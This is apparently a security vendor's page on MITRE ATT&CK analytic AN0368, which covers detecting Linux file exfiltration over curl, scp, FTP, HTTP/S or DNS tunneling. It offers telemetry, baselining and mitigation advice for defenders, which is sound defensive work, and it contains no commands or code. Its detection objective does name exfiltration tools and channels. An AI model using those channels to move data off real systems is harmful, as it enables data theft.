AN0368: Analytic 0368
Detects file exfiltration using tools like curl, scp, or custom binaries over protocols such as FTP, HTTP/S, or DNS tunneling, especially outside baseline user behavior.
Analyst context for executives and security teams
This analytic matters because it focuses on potential file exfiltration from Linux systems using common transfer tools or custom binaries over FTP, HTTP/S, or DNS tunneling. For leaders, the decision value is whether the organization can distinguish normal Linux data movement from suspicious outbound transfer behavior before sensitive data loss becomes an incident-response and compliance problem.
Executive priority
Prioritize this as a data-loss and operational resilience validation item for Linux environments that store or process sensitive information. Executives should ask whether outbound transfer behavior is baselined, whether SOC teams can investigate unusual use of curl, scp, or custom binaries, and whether evidence would support incident decisions, regulatory inquiries, or customer-impact assessments if exfiltration were suspected.
Technical view
For SOC, detection engineering, and IR teams, validate visibility into Linux process execution, command-line activity, file access, outbound network connections, and DNS activity. The analytic description emphasizes exfiltration using tools such as curl, scp, or custom binaries over FTP, HTTP/S, or DNS tunneling, especially when activity deviates from baseline user behavior. Because no official detection logic or ATT&CK relationships were supplied, teams should treat this as a detection objective rather than a ready-to-deploy rule.
Likely telemetry
- Linux process execution telemetry, including executable name and command-line arguments
- User and host context for baseline comparison
- File access or file staging evidence where available
- Outbound network connection metadata for FTP, HTTP/S, and SSH/SCP-related activity
- DNS query logs and DNS volume/pattern data for possible tunneling indicators
Detection direction
- Validate that Linux endpoint and network telemetry can correlate process activity with outbound destinations and transferred data patterns.
- Baseline expected use of curl, scp, and other transfer utilities by user, host role, schedule, and destination to reduce false positives.
- Look for deviations from normal behavior, such as unusual users, uncommon destinations, abnormal transfer volume, unexpected protocols, or atypical timing.
- Include custom or renamed binaries in detection design by relying on behavior, command-line, file path, network activity, and parent-process context rather than tool name alone.
- Review blind spots around encrypted HTTP/S traffic, unmanaged Linux hosts, limited command-line logging, DNS visibility gaps, and egress paths that bypass central logging.
Mitigation priorities
- Establish or improve Linux egress monitoring and logging before relying on this analytic for response decisions.
- Restrict unnecessary outbound protocols and destinations from sensitive Linux systems where business operations allow.
- Apply least-privilege access to sensitive files and systems to reduce the value and scope of potential exfiltration.
- Maintain baselines for authorized administrative and application data-transfer behavior.
- Ensure incident response playbooks include triage steps for suspected Linux-based file exfiltration, including user validation, host containment decisions, and preservation of endpoint, network, proxy, and DNS evidence.
Analyst notes and limits
The supplied object is a MITRE ATT&CK detection analytic for Linux focused on detecting file exfiltration behavior using tools such as curl, scp, or custom binaries over FTP, HTTP/S, or DNS tunneling. No tactics, relationships, or official detection implementation were provided, so recommendations are framed as validation and engineering direction rather than a specific rule.
This take is limited to the supplied STIX fields, external reference, and lack of relationship context. It does not establish active exploitation, attribution, affected products, guaranteed detection coverage, or applicability beyond Linux. Local environment baselines, logging coverage, and approved data-transfer workflows are required to determine materiality and tune detections.
Analytic 0368
Detects file exfiltration using tools like curl, scp, or custom binaries over protocols such as FTP, HTTP/S, or DNS tunneling, especially outside baseline user behavior.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 0be8b7a1ccf2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0368Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.